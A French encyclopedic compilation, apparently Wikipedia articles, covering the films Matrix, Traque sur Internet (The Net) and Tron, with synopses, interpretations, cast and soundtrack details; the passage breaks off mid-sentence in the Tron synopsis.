Cette page d’homonymie répertorie les différentes œuvres portant le même titre. __DISAMBIG__ • Les Experts (The Experts) est un film américano-canadien de Dave Thomas (1989). • Les Experts (Sneakers) est un film américain de Phil Alden Robinson (1992). • Les Experts (CSI: Crime Scene Investigation) est une série télévisée américaine (2000-) ayant donné lieu à deux séries dérivées : • Les Experts : Miami (CSI: Miami, 2002-2012) ; • Les Experts : Manhattan (CSI: NY, 2004-2013). • « Les Experts » est le surnom des joueurs de l'Équipe de France de handball masculin depuis 2008, en référence à la série.

Matrix

Données clés

Titre original The Matrix

Réalisation Andy et Lana Wachowski

Acteurs principaux Keanu Reeves Laurence Fishburne Carrie-Anne Moss Hugo Weaving Joe Pantoliano Gloria Foster

Pays d’origine États-Unis

Sortie 1999

Durée 2 heures 10 minutes (130 minutes)

Pour plus de détails, voir Fiche technique et Distribution Matrix (en France) ou La Matrice (au Québec et au Nouveau-Brunswick), (The Matrix) est un film de science-fiction[1], un « cyberfilm[]», réalisé par Andy et Lana Wachowski (à l’époque Larry) et sorti en 1999. Il est le premier volet d’une trilogie qui se poursuivra avec les films Matrix Reloaded et Matrix Revolutions. Il est l’un des films du genre le plus important de son époque[2],[]. Matrix 452

Synopsis Thomas A. Anderson, un jeune informaticien connu dans le monde du hacking sous le pseudonyme de Néo (Préfixe grec signifiant « nouveau » et anagramme de (The) One en anglais, signifiant « l'Élu » ), est contacté via son ordinateur par ce qu’il pense être un groupe de hackers informatiques. Ils lui font découvrir que le monde dans lequel il vit n’est qu’un monde virtuel dans lequel les êtres humains sont gardés sous contrôle. Morpheus, le capitaine du Nébuchadnézzar, contacte Néo et pense que celui-ci est l’Élu qui peut libérer les êtres humains du joug des machines et prendre le contrôle de la matrice (selon ses croyances et ses convictions).

Résumé du contexte L'apparition des robots, au service de l'homme puis de l'Intelligence artificielle, a entraîné une confrontation entre Humains et Machines , lesquelles ont finalement fabriqué leur propre domaine et concurrencent directement celui des humains. Cette confrontation s’est intensifiée lors du jugement d’un robot pour meurtre, de la haine grandissante contre eux et lors de la création d'un état uniquement dédié aux robots dans le Moyen-Orient qui a fait basculer l'économie mondiale (voir Animatrix). « Nous vous l’avions bien dit, ça devait arriver : à force de produire des machines pour vous servir, vous êtes devenus vous-mêmes les esclaves de vos instruments. » — Patrice Maniglier, « Mécanopolis, Cité de l’avenir[3] » Voyant leurs forces diminuer au fil du temps, les Humains ont recouvert la terre d'un épais nuage, provoquant un « hiver nucléaire », empêchant ainsi les rayons du soleil (la seule source d'énergie abondante utilisable par les Machines) de passer. Les Machines ont donc dû chercher une nouvelle source d'énergie et ont tourné leurs recherches vers la bio-électricité. Une fois la victoire acquise, les machines ont fabriqué les tours nécessaires au fonctionnement et à la maintenance de leurs générateurs, et se sont assurées d'une production régulière d'humains en les cultivant et en les conservant dans des cocons remplis d'un liquide nutritif. Une fois le cocon connecté sur une tour, les câblages permettent de fournir l'air à l'humain ainsi que de renouveler le liquide nutritif, et à prélever sa bio-électricité. Le problème, c'est qu'emprisonnés de la sorte, les Humains ne fournissaient pas assez d'énergie. Les Machines ont donc créé la Matrice, sorte d'univers virtuel dans lequel les Humains s'épanouissaient, assurant une quantité d'énergie considérable aux Machines[4]. Les humains n'ont donc pas conscience de la réalité et du « monde qu'on superpose à leur regard ». « La Matrice est universelle. Elle est omniprésente. Elle est avec nous ici, en ce moment même. Tu la vois chaque fois que tu regardes par la fenêtre, ou lorsque tu allumes la télévision. Tu ressens sa présence, quand tu pars au travail, quand tu vas à l’église, ou quand tu paies tes factures. Elle est le monde, qu’on superpose à ton regard pour t’empêcher de voir la vérité[5]. » — Laurence Fishburne, Matrix, 1999, écrit par les Frères Wachowski Mais cette Matrice contient différents bugs, dont l'apparition d'un homme qui peut jouer avec les règles de ce monde virtuel. Cet homme est considéré comme un Élu par les quelques milliers d’humains qui ont pu survivre dans le monde réel, cachés sous Terre dans la ville de Sion . Les Humains voient en l’Élu le sauveur de l’humanité. « N'envoyez jamais un humain faire le travail d'un programme[6]. » — Hugo Weaving, Matrix, 1999, écrit par les Frères Wachowski Matrix 453

Technique

Ce film fut considéré par le grand public comme une véritable révolution[7]. Sur le plan esthétique, son emploi intensif d’une technique de tournage (existant antérieurement mais assez peu utilisée) : le bullet time, effet de « caméra mobile » (une série d'appareils photo disposées en cercle) autour d’un sujet en mouvement ralenti, a séduit les spectateurs. Cette technique inventée par Emmanuel Carlier en 1995 fut utilisée par Michel Gondry dans une publicité pour Smirnoff en 1997, la première utilisation au cinéma fut sans doute dans Perdus dans l'espace (Lost in Space) de Stephen Hopkins (1998). De nombreux éléments graphiques ont été repris de Ghost in the Shell de Mamoru Oshii, notamment le générique[8].

Sur le fond, cependant, aucun des éléments pris séparément n’est proprement révolutionnaire. La manière de filmer est très inspirée du cinéma de Hong-Kong et de John Woo, les thèmes sont des classiques du cyberpunk, avec des éléments de Tron (Steven Lisberger, 1982, le nom de M. Anderson étant le nom d’un programmeur dans l’histoire de Tron) et de Terminator (James Cameron, 1984) pour le thème central (les machines dominant le monde dans le futur).

Interprétations La science-fiction est qualifiée de révélateur[], dans le sens où elle retranscrit les « fantasmes », « questions » qui se développent parallèlement aux avancées, aux progrès des sciences, mais aussi en même temps que l’évolution des lois et des mœurs [9]. « The Matrix est la saga qui va marquer, comme Star Wars ou Dune. Même mélange universel de philosophie, de culture ancienne, de légendes et de mythes. Même grosse soupe spirituelle d’où doivent émerger un leader guerrier, un élu noble, sa fiancée, une prophétie, une entité ennemie, une rébellion, une guerre[10]. » Des articles de presse ont souligné lors de sa sortie, la récupération ou l'utilisation par Matrix de concepts ou mots existants déjà préchargés de sens et sur lesquels il se greffe : Morpheus (Morphée divinité des rêves, donc de l'illusion), le lapin blanc de Lewis Carroll, la notion d’éveil inspirée du bouddhisme, la Bible (messianisme avec l'élu, les noms Nebuchadnezzar et Zion sont les transcriptions phonétiques anglaises de Nabuchodonosor et Sion, Trinity et la Trinité)... Il peut être vu d'un œil dénonçant une élite dominant le monde, dans la mesure où, la matrice contrôlée par les machines représente le contrôle de notre société actuelle par une élite. Elle peut aussi bien être considérée comme une reprise adaptée au monde moderne du concept hindouiste de la mâyâ et de l’allégorie de la caverne de Platon[11],[],[], où le monde que nous voyons ne reflète que les ombres du réel. « cinéma pour préparer à Platon, aurait dit Pascal, s’il avait su[]. » Matrix, machine philosophique, Alain Badiou, p.129 Cette adaptation est un thème qui a souvent été abordé par la science-fiction de la seconde moitié du XXe siècle. On peut évoquer : • "Dreams for sale" réalisé par Tommy Lee Wallace de la série La Cinquième Dimension diffusé en France en 1985 : une jeune femme découvre que ce qu'elle perçoit comme la réalité d'un merveilleux pique-nique en famille n'est en fait qu'un rêve suggéré dans son esprit pendant que son corps et celui de nombreuses personnes sommeillent sous le contrôle d'une technologie futuriste ; • "Tempests" de la série Au-Delà du réel : l'aventure continue diffusé en France en 1995 : Le perçu du réel qu'y a un astronaute en voyage pour amener un remède à une colonie spatiale est la résultante d'une drogue administrée Matrix 454

en continu par des extraterrestres parasites aux corps des astronautes qui gisent inconscients dans l'épave de leur navette qui s'est écrasée. Dans ces deux œuvres comme dans Matrix le monde perçu est suggéré à l'esprit humain inconscient. Dans diverses œuvres la science-fiction a aussi longuement traité du sujet des mondes virtuels parallèles connectés au nôtre. Il s'agit souvent de simulacres électroniques ou d'univers gérés par des ordinateurs. On peut évoquer : • le livre-culte de Daniel F. Galouye, Simulacron 3 paru en 1964 qui inspira deux films : Le Monde sur le fil réalisé en 1973 par Rainer Werner Fassbinder et The 13th Floor sorti en 1999 ; • Ubik de Philip K. Dick paru en 1969 ; • Le projet Lifehouse écrit par Pete Townshend dès 1969 ; • Tron sorti en salles en 1982 ; • Neuromancien de William Gibson paru en 1984 ; • eXistenZ de David Cronenberg, sorti en salles en 1999. On peut noter que le film a d'ailleurs suscité un livre de philosophie regroupant plusieurs contributions : Matrix, machine philosophique (éditions Ellipses, 2003). Le désir de rechercher une explication d’ensemble a engendré une profusion d'hypothèses, aucune n'ayant jamais été confirmée ni démentie par les frères Wachowski. L’une d’entre elles en fait une synthèse rassemblant des visions philosophiques très diverses, dont, entre autres la philosophie de Berkeley, de Descartes, de Spinoza, Karl Marx ou encore Nietzsche[12],[]. Le court-métrage The philosophy and the Matrix en a été tiré. Une troisième y voit une vision tiers-mondiste en arguant du fait que les agents sont toujours des blancs habillés uniformément à l'occidentale, alors que les autres personnages reflètent, surtout à partir du deuxième film, la diversité des populations de la planète. Une quatrième y voit une théorie développée par des sources ufologiques ou par Robert Monroe, Valdamar Valerian, ainsi que Laura Knight-Jadczyk, qui expliquent que toute forme de vie terrestre est une source d'énergie pour des entités d'une dimension supérieure compénétrant la nôtre, source qui de ce fait, doit être tenue sous contrôle, etc. L’aspect binaire mit en avant dans le film s’inscrit dans la culture actuelle, dite culture technologique. On y voit ainsi des références à Microsoft, Apple. L’enseignement secondaire développe cette tendance en facilitant l’accès aux nouvelles techniques de communications aux élèves[13].

Références et allusions Les références à divers films, contes ou autres œuvres sont nombreuses dans Matrix. L'une d'entre elles est Alice au pays des merveilles. Outre la référence directe au lapin blanc, Andy et Lana Wachowski multiplient les indices rapprochant leur film de cette œuvre. Ainsi, quand Néo se « réveille » dans le monde réel, il tombe dans un tuyau interminable avant de tomber dans un lac souterrain de la même manière qu'Alice tombe dans l'interminable terrier vertical du lapin blanc. De plus, dans la scène précédente, Néo observe son reflet dans le miroir et passe sa main « à travers » ce miroir. Or, le deuxième tome des aventures d'Alice s'intitule De l'autre côté du miroir. Une autre référence est celle reprenant un élément de 1984 de George Orwell. En effet, dans ce roman, la salle de torture redoutée de tous est la salle 101. La chambre où Néo habite au début du film est numérotée 101 ; à la fin de Matrix, Néo meurt en voulant entrer dans l'appartement 303 (soit 3 × 101) ; dans Matrix Reloaded l'étage où réside le Mérovingien est l'étage 101 ; c'est aussi le code que Morpheus donne pour caractériser le Freeway, qui peut également faire référence à l'autoroute du même nom aux États-Unis (Californie). 303 dans Matrix est aussi le numéro de la salle où se trouve Trinity quand la police tente de l'interpeller. Ceci peut aussi s'expliquer par le fait que 101 reflète le code binaire du langage informatique. Dans l'enseignement aux États-Unis, 101 désigne aussi le cours d'initiation à une matière quelconque : Philosophy 101[14], Programming 101[15], English 101[16], etc. (module 01 de la 1re année de cours). Matrix 455

La référence à la "pilule rouge" viendrait du film de Paul Verhoeven, Total Recall (film qui est une adaptation à l'écran de la nouvelle We can Remember it for You Wholesale de Philip K. Dick), dans lequel la prise de celle-ci signifie l'acceptation psychologique d'un retour à la réalité pour le héros de l'histoire. Le terme Matrix aurait été utilisé pour la première fois dans ce sens dans un épisode de la série Doctor Who, puis a été popularisé dans l'œuvre de William Gibson, dont sont également inspirées les allusions aux Rastafaris et à la Cité de Sion. À noter aussi les connexions avec Johnny Mnemonic (au-delà du fait que c'est le même acteur qui joue le rôle principal). Les caractères utilisés pour représenter le code de la matrix (pluie numérique) sont constitués en grande partie de katakanas inversés. Cela peut être rapproché au fait que les frères Wachowski ont cité certains animes japonais comme Ghost in the Shell pour source d'inspiration[8]. Cypher appelle Néo Dorothy et lui parle de quitter le Kansas, ce qui est une référence au Magicien d'Oz. La mescaline, substance hallucinogène, est citée dans le premier épisode. Plus généralement, la trilogie s'inspire des expériences psychédéliques. La tenue des différents capitaines de vaisseaux dans le monde réel tel que Morpheus et Niobe, fait référence à la série Star Trek, puisqu'elle utilise le même code couleur. De nombreuses références à des films d'arts martiaux sont utilisées tout au long du film. Néo prend régulièrement des poses de combat rappelant celles de Bruce Lee ou autres. De plus, nous pouvons remarquer que Néo est capable de voler (dans les trois volets) et « voit » malgré son aveuglement causé par l'agent Smith via Ben dans le troisième film ce qui pourrait faire penser aux différents pouvoirs de super-héros DC Comics : Superman (la veste de Néo faisant office de cape, dans Matrix Reloaded Néo rattrape Trinity en plein vol tel Superman, rattrapant Loïs Lane) et de super-héros Marvel: Daredevil pour sa « vision » exceptionnelle du monde alors même que ce héros est aveugle. On peut noter des similitudes de scénario et de décors avec le film Dark City, sorti un an avant Matrix alors que la version définitive du scénario de Matrix aurait été achetée en 1994 par la Warner Bros. Pour des raisons de budget, Matrix aurait réutilisé certains des décors de Dark City, les deux films ayant été tournés dans le même studio.

Fiche technique • Titre en France : Matrix • Titre au Québec : La Matrice • Titre original : The Matrix • Réalisation : Andy et Lana Wachowski • Scénario : Andy et Lana Wachowski • Décors : Owen Paterson • Musique : Don Davis • Production : Warner Bros. Pictures, Village Roadshow Pictures, Joel Silver pour Silver Pictures • Pays d'origine : États-Unis Australie • Format : couleurs - 2,35:1 - son Dolby Digital DTS - 35 mm • Genre : Science-fiction •• Durée : 135 minutes •• Budget : 63.00 M$ •• Classification : • États-Unis : R Rated R for sci-fi violence and brief language • France : accord parental •• Dates de sortie : • États-Unis : 31 mars 1999 Matrix 456

• Canada : 31 mars 1999 • France : 23 juin 1999

Distribution

• Keanu Reeves (VF : Jean-Pierre Michaël) : Néo ou Thomas A. Anderson • Carrie-Anne Moss (VF : Danièle Douet) : Trinity • Laurence Fishburne (VF : Pascal Renwick) : Morpheus • Hugo Weaving (VF : Vincent Grass) : l’agent Smith • Gloria Foster (VF : Jacqueline Cohen) : L'Oracle r • Joe Pantoliano (VF : Gilles Tamiz) : Cypher ou M Reagan • Marcus Chong (VF : Maurice Decoster) : Tank • Matt Doran (VF : Christophe Lemoine) : Le Mulot • Belinda McClory (VF : Ivana Coppola) : Switch • Julian Arahanga : Apoc • Anthony Ray Parker : Dozer • Paul Goddard : l’agent Brown • Robert Taylor : l’agent Jones Le rôle de l'Agent Smith fut proposé à l'acteur français Jean Reno, qui le déclina pour tourner le film Godzilla. Le rôle de Néo fut proposé à l'acteur américain Will Smith, qui le déclina pour tourner le film Wild Wild West.

Bande originale Deux albums ont été commercialisés. Les 10 pistes de la deuxième bande-son ont été composées par Don Davis mais ne donnent qu'un aperçu de 30 minutes de son œuvre pour le film. Le réel travail orchestral tient en fait sur un album, de deux CD de 50 minutes chacun, intitulé The Complete Motion Picture Score. C'est notamment dans cet album, très rare, que l'on retrouve la musique de la séquence du début dans sa version complète, ainsi que la musique du combat Neo/Smith dans le métro (The Subway Fight) mais aussi celle de la scène du miroir (The Lafayette Mirror) ou encore celle du combat dans le Dojo entre Neo et Morpheus (Bow Whisk Orchestra et Switch Or Break Show qui sont des anagrammes de Wachowski Brothers) Autres musiques, utilisées dans le film : • Dissolved Girl, par Massive Attack (au début, lorsque Neo dort devant son ordinateur) • Minor Swing, par Django Reinhardt (premier morceau de jazz entendu chez l'Oracle) • I'm Beginning To See The Light, par Duke Ellington (second morceau de jazz entendu chez l'Oracle) • Clubbed to death, par Rob Dougan (quand Neo croise " la fille en robe rouge") Autres titres souvent cités : • Matrix theme, par Don Davis, qui est une reprise du morceau Enigma variations (andante) écrite en 1899 par Sir Edward Elgar. Matrix 457

Récompenses • Récompenses aux Oscars du cinéma 1999 : •• Meilleur montage •• Meilleurs effets visuels •• Meilleur son •• Meilleur montage sonore

Autour de la production du film Lorsque le producteur Joel Silver est venu demander aux studios Warner de produire le premier volet de Matrix, ces derniers n'ont accepté de le financer que sur la base d'un accord de distribution exclusive[réf. souhaitée] avec sa société de production Silver Pictures. De plus, Matrix étant dès le départ prévu comme une trilogie[réf. nécessaire], ils acceptèrent d'envisager de produire deux suites[réf. souhaitée] pour la vidéo en cas de succès.

Filmographie Matrix • 1999 : Matrix (The Matrix) de Andy et Lana Wachowski avec Keanu Reeves, Laurence Fishburne • 2002 : Animatrix 9 courts films américano-japonais d'animation SF • 2003 : Matrix Reloaded (The Matrix Reloaded) de Andy et Lana Wachowski avec Keanu Reeves, Laurence Fishburne • 2003 : Matrix Revolutions (The Matrix Revolutions) de Andy et Lana Wachowski avec Keanu Reeves, Laurence Fishburne

Produits dérivés

Jeux vidéo • 2003 : Enter the Matrix sur GameCube, PC, PlayStation 2 et Xbox ; • 2005 : The Matrix Online sur PC ; • 2005 : The Matrix: Path of Neo sur PlayStation 2, Xbox et Windows.

Bandes dessinées • 2003 : The Matrix

L'univers de Matrix

L'environnement Les personnages évoluent dans deux univers : •• la Matrice : univers virtuel réaliste dans lequel les humains sont enfermés, cet univers modélise le monde actuel. Il a existé plusieurs versions de la matrice, qui se corrige au fur et à mesure des itérations. • le monde réel : il s'agit de la Terre en ruine et sous une couche de nuages cachant définitivement le Soleil. Les machines ont pris le contrôle, et utilisent les êtres humains comme source d'énergie. Pour les garder vivants et productifs, ils les branchent à la Matrice pour leur donner une impression de liberté. Des humains rebelles ont formé une ville souterraine, Sion, à laquelle les machines cherchent à accéder par tous les moyens afin de la détruire. En anglais, Zion est l'écriture phonétique de Sion, nom qui désigne le mont Sion, sur lequel est bâtie Jérusalem ; par extension, Sion désigne Jérusalem. Il est également précisé dans Matrix Reloaded que Sion comporte environ 250 000 habitants. Matrix 458

Certains éléments laissent à penser que Sion ferait partie de la Matrice, et qu'il n'y aurait pas de véritable monde réel, les Humains étant en fait des programmes ignorant leur vraie nature. Les films sont en effet parsemés de détails allant dans le sens de cette thèse sans toutefois faire de cette interprétation une vérité unique[17]. L'univers de Matrix peut en effet être interprété d'une foule de façons différentes en fonction de la sensibilité de chacun sans qu'aucune ne soit plus vraie ou plus fausse qu'une autre, les réalisateurs ayant fait en sorte que chaque niveau de lecture soit plausible et cohérent.

Les Personnages

Sion (Humains) •• Néo •• Morpheus •• Trinity

Exilés Les exilés apparaissent dans les deux derniers volets de la trilogie Matrix Reloaded et Matrix Revolutions. Ce sont des programmes de la Matrice qui, une fois leur mission terminée, refusent la destruction et se cachent en son sein. Parmi eux sont à nommer l'Agent Smith, l'Oracle, le maître des clefs (the Keymaker), ou encore Sati, la petite fille rencontrée par Néo dans la station de métro[18].

Les Machines •• Les Sentinelles : machines se promenant dans le monde réel afin de tuer toute forme de vie non-autorisée. Elles sont contrôlées par la Matrice. Elles font partie du programme Monde du Dessous de la Matrice, de manière à faire croire aux humains du Monde du Dessous la rivalité entre humains et machines. •• Les APU : ce sont des machines pilotées par les humains dans le but de défendre Sion. Le chef des unités d'élite d'APU est le capitaine Mifune.

Les "Programmes" dans la Matrice

Les Agents Ils se promènent librement dans la Matrice pour en assurer la sécurité et lutter contre les humains la piratant. On ne peut pas les tuer car ils intègrent les corps humains branchés sur la matrice en se téléchargeant "sur" eux ; s'ils se font tuer, ils se téléchargent sur un autre corps, en laissant derrière eux le cadavre de leur hôte.

L'Agent Smith L'Agent Smith est tout d'abord lié à la Matrice puis, à cause d'un bug causé par Néo sur ce programme, il réussit à s'émanciper de la Matrice. Son oreillette ne fonctionne plus après. Cela signifie qu'il ne peut plus s'introduire dans les images intérieures résiduelles des humains en se téléchargeant dessus mais il peut se multiplier en introduisant une division de son programme. Il crée ainsi un autre lui totalement indépendant. Matrix 459

L'Oracle Programme très ancien ayant vu l'évolution de la Matrice. Il sert de guide aux humains. Toujours très énigmatique, elle est protégée par Séraphin. C'est elle qui manipule tout le monde depuis le début, car, en tant que programme de la Matrice, il est de son devoir de la protéger de l'anomalie Néo. Une autre interprétation est qu'elle est une autre anomalie de la matrice car elle agit en dépit de l'Architecte, dans le troisième volet.

Le Mérovingien On pense que le Mérovingien fut créé peu après l'apparition de la Matrice. C'est un trafiquant d'informations très dangereux. Il fait des contrats avec les autres programmes de la Matrice et tient prisonnier le maître des clefs.

Les jumeaux Les jumeaux sont les gardes du Mérovingien, ils peuvent devenir translucides et avoir un corps fantôme quand on leur tire dessus ou qu'on essaie de les toucher avec une arme blanche. Ils ont, comme les agents, de très bons réflexes.

L'Homme du Train Il est au service du Mérovingien. Il gère la liaison entre la Matrice et la source du monde des machines.

L'Architecte Concepteur de la Matrice. Il révèlera à Neo toute la machination de la Matrice (Monde du Dessus, du Dessous, les mensonges de l'Oracle...).

Sati Petite fille, programme responsable de l'aurore : première apparition dans Matrix Revolutions

Bibliographie • Matrix, machine philosophique (collectif), Ellipses, 2003. • Michaël La Chance - Capture totale. Matrix, mythologie de la cyberculture, Québec, Presses de l’Université [19] Laval, coll. « Intercultures », 2006, 200 p.(ISBN 2-7637-8304-X) Consulter Capture totale sur Google books • Hugo Clémot, Les jeux philosophiques de la trilogie Matrix, Vrin, 2011. • Slavoj Žižek, Bienvenue dans le désert du réel, Champs-Flammarion, 2002. Michaël La Chance

Notes et références

[1] Le monde imaginé dans cette trilogie est un monde imaginaire : des mondes totalement imaginaires peuvent être envisagés (comme, par exemple, dans la série des Matrix, 1999-2003). Joël MAGNY, « CINÉMA (Réalisation d'un film) - Mise en scène », Encyclopædia

Universalis [en ligne], consulté le 28 mars 2013. URL : (Texte en ligne) (http:/ / www. universalis. fr/ encyclopedie/

cinema-realisation-d-un-film-mise-en-scene/ )

[2] The neo Wave (http:/ / www. ew. com/ ew/ article/ 0,,450805,00. html) sur Entertainment Weekly : « The Matrix is the most influential action movie of its generation. This is not hyperbole. It isn’t even a stretch. » [3] Cité de l’avenir », in A. Badiou, Thomas Bénatouïl, E. During, P. Maniglier, D. Rabouin, J.-P. Zarader, Matrix, machine philosophique, Ellipses, 2003, pp. 98-108. [4] Animatrix La Seconde Renaissance, parties I et II

[5] Citations Matrix - Morpheus sur Wikiquote (http:/ / fr. wikiquote. org/ wiki/ Matrix#Morpheus)

[6] Citations Matrix - Smith sur Wikiquote (http:/ / fr. wikiquote. org/ wiki/ Matrix)

[7] Commentaires sur le film (http:/ / www. voir. ca/ publishing/ article. aspx?article=26135& section=7)

[8] Évocation de Ghost in the Shell par les frères Wachowski (http:/ / www. warnervideo. com/ matrixevents/ wachowski. html)

[9] Les films de science-fiction (http:/ / www. cahiersducinema. com/ Les-films-de-science-fiction. html) sur Les Cahiers du cinéma

[10] Journal Québécois - ‘’Voir’’ (avant la sortie du 2) (http:/ / voir. ca/ cinema/ 2003/ 05/ 14/ the-matrix-reloaded-prise-femelle/ )

[11] Cinema et philosophie (http:/ / www. cahiersducinema. com/ Cinema-et-philosophie. html) sur Les Cahiers du cinéma Matrix 460

[13] Jean-François MATTÉI, « CULTURE - Le choc des cultures », Encyclopædia Universalis [en ligne], consulté le 28 mars 2013. URL :

(Texte en ligne) (http:/ / www. universalis. fr/ encyclopedie/ culture-le-choc-des-cultures/ )

[14] Philosophy 101 (http:/ / www. google. fr/ search?hl=fr& q="philosophy+ 101")

[15] Programming 101 (http:/ / www. google. fr/ search?hl=fr& q="programming+ 101")

[16] English 101 (http:/ / www. google. fr/ search?num=50& hl=fr& q="English+ 101")

[17] Ces points sont longuement développés sur le site matrix-happening (http:/ / www. matrix-happening. net) [18][18]Matrix trilogie

[19] http:/ / books. google. fr/ books?id=YUTFDsTAnE4C& dq=michael+ la+ Chance+ capture+ totale

Liens externes

• (en) Matrix (http:/ / www. imdb. com/ title/ tt0133093/ combined) sur l’Internet Movie Database

• David Morin Ulmann, « Matrix ou le sablier de nos représentations » (http:/ / quaderni. revues. org/ 235), sur

http:/ / quaderni. revues. org'', mis en ligne le 05 octobre 2008. Consulté le 28 mars 2013 et reconsulté le 30 mars 2013

• Portail de la science-fiction • Portail de la sécurité informatique • Portail de Time Warner • Portail du cinéma américain • Portail des années 1990 Traque sur Internet (film)

Pour la série télévisée inspiré du film, voir Traque sur Internet (série télévisée). Traque sur Internet

Données clés

Titre original The Net

Réalisation Irwin Winkler

Scénario John Brancato Michael Ferris

Acteurs principaux Sandra Bullock Jeremy Northam Dennis Miller Wendy Gazelle

Pays d’origine États-Unis

Sortie 1995

Durée 114 min

Pour plus de détails, voir Fiche technique et Distribution Traque sur Internet (The Net) est un film américain réalisé par Irwin Winkler en 1995 avec Sandra Bullock. Au Québec, le film est intitulé Accès Interdit. Traque sur Internet (film) 461

Synopsis Angela Bennett, brillante analyste informatique chez Cathedral Systems, est spécialiste dans la sécurité informatique, traquant les virus, quels qu’ils soient. Ne sortant jamais de chez elle, elle correspond avec son employeur par téléphone. Ses seuls contacts à l’extérieur sont sa mère souffrante d’Alzheimer et ses contacts sur le 'chat'. Angela est intriguée par une anomalie sur un programme, le « Fantôme de Mozart », enregistré sur une disquette que lui a envoyée son ami Dale Hessman. En effet, en cliquant sur un π en bas de l’écran elle peut accéder à des données confidentielles comme celles de l’hôpital de New York. Elle accepte la proposition de Dale de venir la rejoindre en avion de San Francisco mais le lendemain, l'avion s'écrase mystérieusement, son ordinateur de bord ayant été brouillé. Quelque temps après, sur une plage du Mexique où elle prend ses premières vacances depuis six ans, elle est séduite par Jack Devlin avec qui elle se trouve beaucoup de points communs, comme son ancienne marque de cigarette, son film préféré. Celui-ci est en fait un malfrat qui s'intéresse surtout à la disquette. Lorsque Jack essaie de la tuer sur un bateau, Angela lui échappe en sautant dans le canot de sauvetage et en gagnant le rivage, elle a un accident: quand elle se réveille, elle se retrouve dans un hôpital et constate la destruction de la disquette endommagée. Commence alors la traque… Son identité est détruite et elle se voit désormais rebaptisée Ruth Marx dans les fichiers informatiques, pourvue d'un casier judiciaire pour meurtre et trafic de drogue. Jack Devlin est le bras armé d'un groupe d’info terroristes, Cerbère, voulant contrôler l'informatique mondiale. Le Cerbère a d'autant mieux accès aux sites sensibles qu'il commercialise un logiciel renommé de sécurité informatique. Il peut ainsi altérer le dossier médical du secrétaire d’État à la défense opposé au déploiement de ce logiciel pour lui faire croire qu’il était atteint du sida; il se suicide alors. Ils vendent la maison d’Angela, sa voiture. Angela va essayer de retrouver la piste des Prétoriens, bien que son identité à Cathedral Systems soit usurpée par une employée des Prétoriens. Elle se fait aider par son ancien psy et ancien amant, et essaie aussi de se faire aider par un de ses amis du 'chat', mais ces deux alliés sont éliminés. Elle a un atout et un défaut: personne ne la connaît. Elle sait que toute notre vie est sur des fichiers informatiques, et que pour cela, le Cerbère est très dangereux. Elle se rend au Q.G de Cathedral Systems pour découvrir qui est le chef des Prétorians, qui n'est autre que le directeur du Cerbère. Sur l’ordinateur de celle qui a pris sa place en tant qu’Angela Bennet, elle retrouve une copie du virus qu'elle recherchait.

Fiche technique • Scénario : John D. Brancato & Michael Ferris • Musique : Mark Isham • Photographie : Jack N. Green • Montage : Richard Halsey • Production : Rob Cowan & Irwin Winkler pour Columbia Pictures & Winkler Films • Distribution : Columbia Pictures • Pays d'origine : États-Unis • Langue : anglais, espagnol •• Durée : 114 minutes •• Couleur : Technicolor •• Son : Dolby SR • Date de sortie : États-Unis 28 juillet 1995 Traque sur Internet (film) 462

Distribution

• Sandra Bullock (VF : Anneliese Fromont - VQ : Élise Bertrand) : Angela Bennett / Ruth Marx • Jeremy Northam (VF : Bernard Gabay - VQ : Daniel Picard) : Jack Devlin • Dennis Miller (Vf : Daniel Lafourcade - VQ : Alain Zouvi) : Docteur Alan Champion me • Diane Baker (VQ : Madeleine Arsenault) : M Bennett • Wendy Gazelle (VF : Rafaele Moutier - VQ : Johanne Garneau) : Ruth Marx • Ken Howard (VQ : Yvon Thiboutot) : Michael Bergstrom • Ray McKinnon (VF : Thierry Ragueneau - VQ : Benoît Rousseau) : Dale Hessman • Daniel Schorr (VF : René Bériard) : Reporter de WNN • L. Scott Caldwell (VF : Fatiha Chriette) : Lynn • Robert Gossett (VF : Thierry Desroses - VQ : Manuel Tadros) : Ben Phillips • Kristina Krofft : L'infirmière • Juan García : Le juriste au bureau • Tony Perez : Le Docteur mexicain me • Margo Winkler : M Raines • Gene Kirkwood (VF : Mario Santini) : Stan Whiteman

Récompense nommé aux MTV Movie Awards pour Sandra Bullock comme Most Desirable Female [1].

Adaptation En 1998, le film a été adapté en série télévisée Traque sur Internet (The Net). Une suite intitulée Traque sur internet 2.0 (Accès Interdit 2.0 au Québec) est également sortie en vidéo en 2006.

Lien externe (en) Traque sur internet [2] sur l’Internet Movie Database

• Portail de la sécurité informatique • Portail du cinéma américain

Références

[1] http:/ / www. imdb. com/ title/ tt0113957/ awards

[2] http:/ / www. imdb. com/ title/ tt0113957/ combined Tron 463 Tron

Pour les articles homonymes, voir Tron (homonymie). Tron

Données clés

Réalisation Steven Lisberger

Scénario Steven Lisberger Bonnie MacBird

Sociétés de production Walt Disney Pictures Lisberger/Kushner

Pays d’origine États-Unis

Genre Science-fiction

Sortie 1982

Durée 96 minutes

Pour plus de détails, voir Fiche technique et Distribution Tron est un film de science-fiction américain réalisé par Steven Lisberger, sorti en 1982. Une suite, Tron : L'Héritage, a été réalisée en 2010 par les studios Disney.

Synopsis Kevin Flynn était un programmeur de génie chez ENCOM, mais la paternité des jeux vidéo qu'il y a développé a été usurpée par un de ses collègues, Ed Dillinger. Ce dernier a également réussi à le faire licencier. Devenu tenancier d'une salle d'arcade où tournent ses propres jeux au bénéfice d'ENCOM, Kevin tente, chaque soir depuis chez lui, de pénétrer le système informatique de la société éditrice. À l'aide de son programme CLU (Codified Likeness Utility en anglais) il recherche des preuves du vol dont il a été victime. Mais le système est bien protégé, sous le contrôle du MCP (Maître Contrôle Principal ou Master Control Program en v.o), un ancien programme d'échecs créé jadis par Dillinger, qui a atteint le stade d'intelligence artificielle par une évolution autonome incontrolée. Dillinger a lui même suivi un chemin paralèlle puisqu'il est devenu PDG de l'entreprise. CLU ayant été neutralisé par le MCP, Kevin n'a d'autre choix que de s'introduire chez ENCOM pour accéder de l'intérieur au système informatique. Pour cela, il peut compter sur la complicité d'anciens collègues : Lora et Alan. Il rejoint un terminal situé dans les laboratoires d'ENCOM où est mené un projet de recherche sur la dématérialisation (téléportation) des objets. Le MCP prend alors le contrôle du laser expérimental et réussit à dématérialiser Kevin pour l'injecter au coeur du système informatique. À l'intérieur de l'ordinateur, les programmes ont l'apparence de leur concepteur. Il y retrouve donc ceux qui reprennent les traits de Lora (programme YORI) et Alan (programme TRON) mais aussi Dillinger (programme SARK). Kevin est capturé par les entités à la solde du MCP qui tentent de l'éliminer en le lançant sur la grille de jeux d'ENCOM (combats de disques et motocycles lumineux). Étant le 